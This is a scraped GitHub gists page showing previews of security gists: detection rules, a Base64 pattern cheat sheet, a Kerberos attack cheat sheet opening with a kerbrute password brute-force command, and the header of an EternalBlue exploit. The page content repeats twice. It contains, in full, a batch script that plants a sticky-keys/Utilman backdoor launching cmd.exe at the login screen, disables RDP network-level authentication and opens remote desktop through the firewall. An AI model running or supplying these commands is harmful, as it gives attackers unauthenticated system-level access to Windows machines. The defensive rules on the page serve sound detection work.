Daniel Ferreira daniel0x00

## Get-AzRetailPrice.ps1
function Get-AzSpotPrice {
    [CmdletBinding()]
    param (
        #VM SKU (e.g. Standard_F8s)
        [String]$Sku,
        #Azure Region (e.g. brazilsouth)
        [String]$Region,
        #ODATA filter to use on the data
        [String]$Filter,
        #Maximum number of records to retrieve, or specify 'Unlimited' for all records. Defaults to 100. This behaves like the Exchange Cmdlets

## Test-DNSName.ps1
using namespace System.Net
using namespace System.Threading.Tasks
using namespace System.Management.Automation
using namespace System.Collections.Generic

function Test-DNSName ([String[]]$hostnames, [int]$Timeout = 3000) {
<#
.SYNOPSIS
Given a list of DNS names, returns the ones that actually resolve to an actual name
#>

## Base64_CheatSheet.md

      
              1 file
            
          
              43 forks
            
          
              6 comments
            
          
              265 stars
            
          
                Neo23x0
                / Base64_CheatSheet.md
            
            
              Last active
              July 5, 2024 17:29
            
              
                Learning Aid - Top Base64 Encodings Table
              
          
    Base64 Patterns - Learning Aid


Base64 Code
Mnemonic Aid
Decoded*
Description


JAB
🗣 Jabber
$.
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:


TVq
📺 Television
MZ
MZ header


SUVY
🚙 SUV
IEX
PowerShell Invoke Expression


SQBFAF
🐣 Squab favorite
I.E.
PowerShell Invoke Expression (UTF-16)


SQBuAH
🐣 Squab uahhh
I.n.
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz


PAA
💪 "Pah!"
&lt;.
Often used by Emotet (UTF-16)


## sysmon_suspicious_keyboard_layout_load.yml
title: Suspicious Keyboard Layout Load
description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
references:
    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
author: Florian Roth
date: 2019/10/12
logsource:
    product: windows
    service: sysmon
    definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              377 forks
            
          
              5 comments
            
          
              1098 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## iddqd.yar
/*
WARNING:

the newest version of this rule is now hosted here:
https://github.com/Neo23x0/god-mode-rules/blob/master/godmode.yar
*/


/*
      _____        __  __  ___        __

## eternalblue8_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

## Get-InjectedThread.ps1
function Get-InjectedThread
{
    <#

    .SYNOPSIS

    Looks for threads that were created as a result of code injection.

    .DESCRIPTION


## sendEWSemail.ps1
Function Send-EWSEmail
{
<#
    .SYNOPSIS
    Sends email via Exchange Web Services

    .DESCRIPTION
    Must be run with parameters

    .PARAMETER Username

## sticky_keys_persitence.bat
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

net start TermService
	function Get-AzSpotPrice {
	[CmdletBinding()]
	param (
	#VM SKU (e.g. Standard_F8s)
	[String]$Sku,
	#Azure Region (e.g. brazilsouth)
	[String]$Region,
	#ODATA filter to use on the data
	[String]$Filter,
	#Maximum number of records to retrieve, or specify 'Unlimited' for all records. Defaults to 100. This behaves like the Exchange Cmdlets
	using namespace System.Net
	using namespace System.Threading.Tasks
	using namespace System.Management.Automation
	using namespace System.Collections.Generic

	function Test-DNSName ([String[]]$hostnames, [int]$Timeout = 3000) {
	<#
	.SYNOPSIS
	Given a list of DNS names, returns the ones that actually resolve to an actual name
	#>
Base64 Code	Mnemonic Aid	Decoded*	Description
`JAB`	🗣 Jabber	`$.`	Variable declaration (UTF-16), e.g. `JABlAG4AdgA` for `$env:`
`TVq`	📺 Television	`MZ`	MZ header
`SUVY`	🚙 SUV	`IEX`	PowerShell Invoke Expression
`SQBFAF`	🐣 Squab favorite	`I.E.`	PowerShell Invoke Expression (UTF-16)
`SQBuAH`	🐣 Squab uahhh	`I.n.`	PowerShell Invoke string (UTF-16) e.g. `Invoke-Mimikatz`
`PAA`	💪 "Pah!"	`<.`	Often used by Emotet (UTF-16)
	title: Suspicious Keyboard Layout Load
	description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
	references:
	- https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
	author: Florian Roth
	date: 2019/10/12
	logsource:
	product: windows
	service: sysmon
	definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
	/*
	WARNING:

	the newest version of this rule is now hosted here:
	https://github.com/Neo23x0/god-mode-rules/blob/master/godmode.yar
	*/


	/*
	_____ __ __ ___ __
	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb, ntlm
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)
	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION
	Function Send-EWSEmail
	{
	<#
	.SYNOPSIS
	Sends email via Exchange Web Services

	.DESCRIPTION
	Must be run with parameters

	.PARAMETER Username
	REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
	REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
	REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

	REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

	netsh firewall set service type = remotedesktop mode = enable
	netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

	net start TermService